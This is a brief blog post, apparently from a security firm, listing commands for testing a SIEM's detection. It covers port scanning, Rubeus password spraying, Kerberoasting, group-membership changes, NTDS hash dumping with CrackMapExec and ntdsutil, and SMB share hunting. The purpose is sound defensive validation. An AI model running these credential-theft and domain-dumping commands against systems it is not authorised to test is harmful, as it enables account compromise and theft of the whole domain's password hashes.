Today we talk about Simple Ways to Test Your SIEM. Feel free to check out the YouTube version of this presentation, as well as our interview with Matt from Blumira for even more context, but here are the essential tools and commands covered:

Port scanning
nmap 10.0.7.0/24 – basic nmap scan
massscan -p1-65535,U:1-65535 --rate=1000 10.0.7.0/24 -v – scan all 65k+ TCP and UDP ports!

Password spraying
Rubeus.exe spray /password:Winter2022! /outfile:pwned.txt – try to log into all AD accounts one time with Winter2022! as the password, and save any pwned creds to pwned.txt

Kerberoasting and ASREPRoasting
rubeus.exe kerberoast /simple
rubeus asreproast /nowrap

Key group membership changes
net group "GROUP NAME" user-to-add-to-a-group /add

Dump Active Directory hashes
cme smb IP.OF.THE.DOMAINCONTROLLER -u user -p password --ntds --enabled
ntdsutil "ac i ntds" "ifm" "create full c:\dc-backup" q q

SMB share hunting
Invoke-HuntSMBShares -Threads 100 -OutputDirectory C:\output – SMB enumeration using PowerHuntShares

Written by: Brian Johnson

Share on socials: